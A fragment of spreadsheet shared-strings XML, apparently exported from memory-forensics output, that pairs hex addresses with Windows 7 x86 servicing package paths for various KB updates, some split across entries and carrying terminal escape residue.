    <t>\Windows\servicing\Packages\Package_for_KB2545698_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8635c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2843630~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde863680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_15_for_KB2545698~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde863a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde863b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2545698_RTM~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde863f18</t>
  </si>
  <si>
    <t>0xde864298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde864680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2547666_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8649b0</t>
  </si>
  <si>
    <t>0xde864a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde864e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2545698~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8651d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2726535_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8655b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8659b0</t>
  </si>
  <si>
    <t>0xde865a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2547666~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde865e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2547666_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde866490</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2843630~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde866548</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde866878</t>
  </si>
  <si>
    <t>0xde866930</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2726535_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde866c00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_141_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde866eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_148_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde867038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde867420</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2729094_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde867818</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_88_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8678d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_11_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde867c00</t>
  </si>
  <si>
    <t>0xde867cb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2729094_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde868038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde868480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde868868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2761217_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde868c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde868f80</t>
  </si>
  <si>
    <t>0xde869038</t>
  </si>
  <si>
    <t>0xde869648</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>0xde869b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_130_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde869c50</t>
  </si>
  <si>
    <t>0xde869f80</t>
  </si>
  <si>
    <t>0xde86a038</t>
  </si>
  <si>
    <t>0xde86a300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2843630~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86a3b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2773072_RTM~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86a6e8</t>
  </si>
  <si>
    <t>0xde86a7a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86ab88</t>
  </si>
  <si>
    <t>0xde86af80</t>
  </si>
  <si>
    <t>0xde86b3c8</t>
  </si>
  <si>
    <t>0xde86b6f8</t>
  </si>
  <si>
    <t>0xde86b7b0</t>
  </si>
  <si>
    <t>0xde86bb98</t>
  </si>
  <si>
    <t>0xde86bec8</t>
  </si>
  <si>
    <t>0xde86bf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86c248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~x86~~6.1.7600.16</t>
  </si>
  <si>
    <t>0xde86c300</t>
  </si>
  <si>
    <t>0xde86c6e8</t>
  </si>
  <si>
    <t>0xde86ca18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2843630_SP1~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86cad0</t>
  </si>
  <si>
    <t>0xde86cec8</t>
  </si>
  <si>
    <t>0xde86cf80</t>
  </si>
  <si>
    <t>0xde86d1c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3071756_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86d490</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2836943~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86d748</t>
  </si>
  <si>
    <t>0xde86da78</t>
  </si>
  <si>
    <t>0xde86db30</t>
  </si>
  <si>
    <t>0xde86df18</t>
  </si>
  <si>
    <t>0xde86e1d0</t>
  </si>
  <si>
    <t>0xde86e5b8</t>
  </si>
  <si>
    <t>0xde86e9a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3109560~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86ed98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2931356~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86ee50</t>
  </si>
  <si>
    <t>0xde86f200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3115858~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86f5e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_116_for_KB3102429~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86f9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3102429_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86fd00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2931356_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde86fdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3102429~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2853952_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8704d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteDesktopService-WinIP-Package~31bf3856ad364</t>
  </si>
  <si>
    <t>e35~x86~~7.1.</t>
  </si>
  <si>
    <t>7601.16398.</t>
  </si>
  <si>
    <t>0xde870590</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3115858_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870a90</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_433_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870b48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138612_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870cc8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138612~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870e30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_194_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde870ee8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~x86~~6.1.</t>
  </si>
  <si>
    <t>0xde871310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2857650~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8713c8</t>
  </si>
  <si>
    <t>0xde8716f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~x86~~6.1.76</t>
  </si>
  <si>
    <t>0xde8717b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3126587_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde871b98</t>
  </si>
  <si>
    <t>0xde871f80</t>
  </si>
  <si>
    <t>0xde872108</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3107998~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde872228</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138378~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8724f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_427_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8727b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde872b98</t>
  </si>
  <si>
    <t>0xde872e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3080079_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde872f80</t>
  </si>
  <si>
    <t>0xde873210</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB4019990~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8732c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2853952~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8739b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-StickyNotes-Package~31bf3856ad364e35~x86~en-US~6</t>
  </si>
  <si>
    <t>0xde873ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_647_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde873cd0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_81_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde873d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_119_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde874248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ICM-Package~31bf3856ad364e35~x86~~6.1.7600.16385</t>
  </si>
  <si>
    <t>0xde874300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3177467_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8747b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3177467~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde874980</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2857650_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde874a38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2862335~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde874e20</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862335_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde875238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2862330~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde875620</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862330_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde875ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862330~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde875eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2862335~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8761e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde876298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2862330~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde876680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2862330~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8769b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_135_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde876a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2862330~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde876d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_48_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde876e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862330_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde877360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PlatformUpdate-Win7-SRV08R2-Package-TopLevel~31b</t>
  </si>
  <si>
    <t>~x86~~7.1.7</t>
  </si>
  <si>
    <t>601.16</t>
  </si>
  <si>
    <t>492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde877748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3184143_SP1~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8779d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2908783_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde877db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8781d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3139398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8785b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8789a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2908783_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde878cd0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde878d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3139398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8796e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3139398_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_366_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3139398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_54_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde879eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3139398_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87a038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2852386~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87a298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3137061_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87a5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2852386_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87a680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3137061~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87aa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3137061_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87ad98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_82_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87ae50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3137061~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87b038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB4040980~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87b298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_16_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87b5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2852386~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87b680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_29_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87ba68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_16_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87be50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3137061~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87c3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046269_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87c7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3046269~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87cc20</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_111_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_138_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87d100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87d4e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB982018_RTM~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87d818</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_83_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87d8d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87dc00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_46_for_KB2808679~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87dcb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_340_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87e520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB982018_SP1~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87e918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_132_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87e9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_57_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87ed00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2729452~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87edb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_55_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87f370</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2970228~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87f428</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_17_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87f708</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PlatformUpdate-Win7-SRV08R2-Package-MiniLP~31bf3</t>
  </si>
  <si>
    <t>86~ar-SA~7.</t>
  </si>
  <si>
    <t>.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde87fa38</t>
  </si>
  <si>
    <t>0xde87faf0</t>
  </si>
  <si>
    <t>86~it-IT~7.</t>
  </si>
  <si>
    <t>0xde87ff80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2742599~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde880038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_114_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde880480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x8</t>
  </si>
  <si>
    <t>6~en-US~6.1.7</t>
  </si>
  <si>
    <t>600.16385.m</t>
  </si>
  <si>
    <t>0xde880868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_412_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde880b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2742599_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde880c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_142_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
